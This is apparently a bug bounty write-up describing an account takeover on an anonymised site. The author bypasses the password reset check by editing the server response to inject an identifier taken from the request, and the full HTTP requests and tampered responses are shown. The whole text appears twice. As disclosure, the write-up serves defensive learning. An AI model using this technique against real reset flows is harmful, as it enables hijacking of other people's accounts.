Hi everyone , here is one of my write-up on account takeover via password reset functionality . As the site is private let assume as site.com
So basically the password reset functionality work flow is like below
So lets start
to reset password user need to visit https://site.com/forgetpassword
the below form will appear ,
So here let say we use victim email id victim@site.com and requested for password reset
after that the below screen will appear , here we need to enter the correct code to reset the password . so the code is 12 digit so no way to brute force.
so here used some random code like "hacker" and i saw there is no validation of code length
so here is the request of code validation
POST /memberp/users/send_reser_instruction
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Request-With: XMLHttpRequest
Referer: http://site.com/forgotpassword
Cookie: bla=bla;
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==
here is the response
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
<div class="Loginerror low_margin" style="margin: 20px auto -25px !important;">The Password reset code entered by you is either invalid or has expired.</div>
so after that i have provided the correct code to analysis the back-end validation
so for a correct code in the response body just changed like this
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("")})
</script>
so as you can see it just validating the prcemailid2 value which we can get from the 1st request
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR
so just in the response body you need to replace with below code
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR")})
</script>
so the final response will be like this
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR")})
</script>
boom now the below screen appears
Now provide the new password and confirm new password and submit the request , password changed successfully . Navigate to login panel and login with new password .
successfully own the account
Status :Fixed
Bounty Rewarded
So basically the password reset functionality work flow is like below
- User requested for password reset
- Then one code(12 digit Alphanumeric ) sent to the registered Email id
- User have to provide the correct code then application ask to set new password
So lets start
to reset password user need to visit https://site.com/forgetpassword
the below form will appear ,
So here let say we use victim email id victim@site.com and requested for password reset
after that the below screen will appear , here we need to enter the correct code to reset the password . so the code is 12 digit so no way to brute force.
so here used some random code like "hacker" and i saw there is no validation of code length
so here is the request of code validation
POST /memberp/users/send_reser_instruction
Content-Lenght: 67
Content-Type: application/x-www-form-urlencoded
Host: site.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
X-Request-With: XMLHttpRequest
Referer: http://site.com/forgotpassword
Cookie: bla=bla;
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHRGaWdyWT0==
here is the response
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
<div class="Loginerror low_margin" style="margin: 20px auto -25px !important;">The Password reset code entered by you is either invalid or has expired.</div>
so after that i have provided the correct code to analysis the back-end validation
so for a correct code in the response body just changed like this
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("")})
</script>
so as you can see it just validating the prcemailid2 value which we can get from the 1st request
_method=POST&data%5Bforgotpassword%5D%5Bpassword+Reset+code%5D=hacker&data%5Bforgotpassword%5D%5Bprcemailid%5D=UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR
so just in the response body you need to replace with below code
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR")})
</script>
so the final response will be like this
HTTP/1.1 200 OK
Date: sun,08 may 2017 10:58:07 GTM
Server: Apache
Connection: Close
Content-Type: text/html; charset=UTF-8
Content-length: 210
<script>
$(document).ready(function(){
$("#enterpasscode").hide();
$("#newpasscode").show();
$("#prcemailid2").val("UkRNS2JSUlZWcEdjdmNnRE1JOWVhuXFVMWpEMWMOREZHWExaaHR")})
</script>
boom now the below screen appears
Now provide the new password and confirm new password and submit the request , password changed successfully . Navigate to login panel and login with new password .
successfully own the account
Status :Fixed
Bounty Rewarded